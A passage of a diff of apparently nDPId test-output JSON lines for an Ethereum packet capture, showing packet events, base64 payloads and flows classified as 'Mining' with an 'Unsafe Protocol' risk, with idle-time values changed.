+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1578508364649,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364649,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9Do1AACcR\/\/USimxDwKgBuHZfdl8EKXURHZU493PpfyH72WrYTKC\/rHcqyoxdJnlAGqx0IUPpfCDPrp1RbMe2PXXL\/Y0gUgYBHgBKX+LNKEC1qdxuKnvxvXevxKSr69S3rpBsxtD9oPpZta4nmfTh\/aybl9dDX7mZAQT5A7z5A7T4TYTKcBxqgnZfgnZfuECGOOF\/DUGQRmRtLD+gVTFTpr29WNtAkV6+wzvS1j2\/a652c2Up+3+CFGHvVHTbjE15jtDjeTNqp85aDPL\/y+3R+E2E1YVu74J6R4J6R7hACdquySb8h9bDyyzBVqIC4RVjIfrd43xNEhVl26cR8q+zCkRbVR7YOVOrP+cqMugQfvn+wj\/y\/7lEeLvwq\/902PhNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYSd5phXgnZfgnZfuEBkLPllDdiGnUJSXb9oWAEuO01k9HXnM4R6tvd0I0GkOXQUhl2VOHTo9e2RsOThxTPe4UrR1rsnalRZskcUYP8N+E2EuRnM0YJv8YJv8bhAWtd39T3gGPqV5\/kAxth9r0Z21IwC3OO8ijNQxmi2ggVwJqg2W08zX0qhgUwFTxRZ7CbZwhQtBb9MNGyCEZnVqfhNhDOhFwyCdl+Cdl+4QK0vqa8HM5bIAwN2G4EpFPUp1DIN0fK8JdET2pxyCxTou65T7kwDQcRwG9J87PVp8UWu5zbalyVDTlzNuCAazd\/4T
YQ0CYBEgnZfgnZfuEDgMt94d8TQv+3IGK5MVBJ+471CdMGgEuFgADFs\/sfR77hApAbinmLOWlg0KBI76fx3iPiGmIjPc2DjV6Y5S+dt+E2EI+XoE4J2X4J2X7hAIvfQZKlYQVCc0QQPwdirlpv8ThVD2qtJQ\/hHeZ\/oRum3Dym8iOrz0uJZ5KMKMAHJAax\/7cDcr+ygJhYzzSAsNPhNhBLbp5+Cdl+Cdl+4QDCSBiBQ8iLhaImD5AvOD3AYyHE8BHtrPD\/FIoEA85BtCVHcvr36Z16jGH+pCLvpF81d5q4peXkgIkeh9Urflwf4TYR82eu0gnZfgnZfuEBXvLisck0JGnGrgRqWL\/bDyJ8qsCwpUwM0sk3OmDN\/PU2NXINnOwgDzonj2zUWAZS5\/UZawhYcs8O8n12+UDva+E2EXN5bw4Jv8YJv8bhAmWLd+VP5u1ibBrgKagKp3py+njifftSzD32rmGG+J3QgFhiB28tAr4XUS33ESEXzhatHLB80xoRt5yzzOLxbKvhNhCPEd72CeRmCeRm4QEsv12Yq4nMYX4LQY5r9d7BNkGpNa1KOs2Gd6C4u3NZleL+d2v4Anfsu4uoql9o1Ksl2BdYCVg1KygwMa9DuSGuEXhYgYA=="} 01013{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1578508364650,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364650,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFDo5AACcRAm0SimxDwKgBuHZfdl8BsYIGz0wiJjKaUzFXr6IJm0KhJJHh14UxEkvPcQ\/Rk7Fgvbo\/feZhAIkP1PMVdfnmkT0ej4RbRZLeGs4r7KmIG\/NoSRob2DIRR9KSxxR5ApQK0GtL+DiOoUZ+LI2SWe0lCUL6AQT5AUT5ATz4TYSnR61sglIIglIIuEB7ukp3Oj6MzbNl3nDN0jQiNpC1V5v5rn9Rt7ZEw1VBzFla5k6rBHcylJhBRGAYzBX+17ncBsVtgVPJrKMh7nvV+E2EEop59oKMoIKMoLhASS3OSNDf3z8b3OyL7l\/Hx\/k821PEzINQHbZfniqNPVksrwSkp6jrG6UYCpQoXvgKZOetorWlposBzYkgatgcWfhNhDP\/TVmCdl2Cdl24QM3iC4E\/jtROh\/yrXbgvFZypcqA1E0NM1pmVBNhPzAEVOKwUDY19JR7HzoFwywH46oqp8Nqzrz5YKF3TzRCEzqb4TYS57vnMglLcglLcuECRN7VxzSUAEA2k0pdpV6OAanNBmMgqxX6AGOkM+qhp9apzS9PVbGdlMMSUUvnshxBsN5liOIkWGjzwRsyI7kXrhF4WIGA="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1578508364654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHl8oAAEARbG\/AqAG4gAAzjHZfdl8AswwF15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"} 
01980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAASM2BBAADcR1ngiYawWwKgBuHZfdl8EeMBgH0wTNhnEtwanpj7oWlZ\/Hp0Gak0vyLNY48lrCKzEN97iWOlAwiKU8J2As0GDwpvqMobAk\/doYUwERgBj\/dX1qwI+w93bqV+opA8zeXK5DOY5QqaAWe1EmRlafyw14V0SAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2ENiSg04J2X4J2X7hAPRqHFTz0e8oEsmOadgUbUG0\/Gq1XFXFWshB59yMDlMnzDbSaQte3vRlNp0x8bXK\/C0IExkQW+7e6O42uaIsSOfhNhG\/lALSCTtaCTta4QNKaGvf27ePtI09PYWMWWoqsTgBFWVV\/OStWx2mo9mqS58z7TiK83yibq71BZSi0CSsekwb4Zyr8nj5zQd0mqCb4TYSkhGWfgnZfgnZfuEBoaZQlH\/tAMTmENPyYivdiK6qXFlTxe+\/p6cPLqiael7D6BFBiRXZHacw3oUOaGk4+u32W1NMUjoJXk06B2mEI+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhHLbOhmCTtaCTta4QOsAfRHCWayd+ePpaQzEOGf3dXjZZgxjuurzp9q\/DaDAlIrlX0hFIpZGowqYAlmPGRQlb2Zp7G196tUzRB5lA1D4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2EI9yzYIJ2YIJ2YLhAOJyQU2JE6mr+PrqS1VpbvrNoILvKRQR+abFnLs+XgISTnL1u7Up3BqfrKb9hyDFv4+EivNbWhPn9c0jykBsfLvhNhC9ngvuCdmKCdmK4QMQewuj5qn6FtR+caLmA7fiCCCWlXl5n4eHsa\/hStv5IXJfR3qW2xYlmjRashSfhzXIk\/cArlEuFCVyLKkliTzj4TYR68x8XgglNgk7WuEDyUr+wEhCRTzC+abav+Qq8gCoJQuHHGbcH\/DZQmfl9EGgUirj+pxEJRc8L7rXREu747IWcesHQp9HRE6vORWkC+E2E1W2gk4Kvx4Kvx7hAdMXaCMYMMwBE0nd2ZguY7X9OffS41d7S\/Y+mPW\/bN2r4s5PDjCrWaOVF\/TvDBjFcUWsPiqOXMHIqsOoggNo9SvhNhE4vwp6Cdl+Cdl+4QPkOM4NqDnpAiCaFdcv7mpRSPLANloklV4wbFH\/35BGlAWuLnC96pYG30ySaUekbUEoxDdJFuDpuhxs7uesYXD\/4TYSOLK6TgnZhgnZhuEDoktJdZWuqibhkACX5AYXpi\/92jauNHaPZe57KQENT7f3lptm8vn\/KsHCyQGycNosbcDhgVNlPlUl4B5KRi2QIhF4WIGA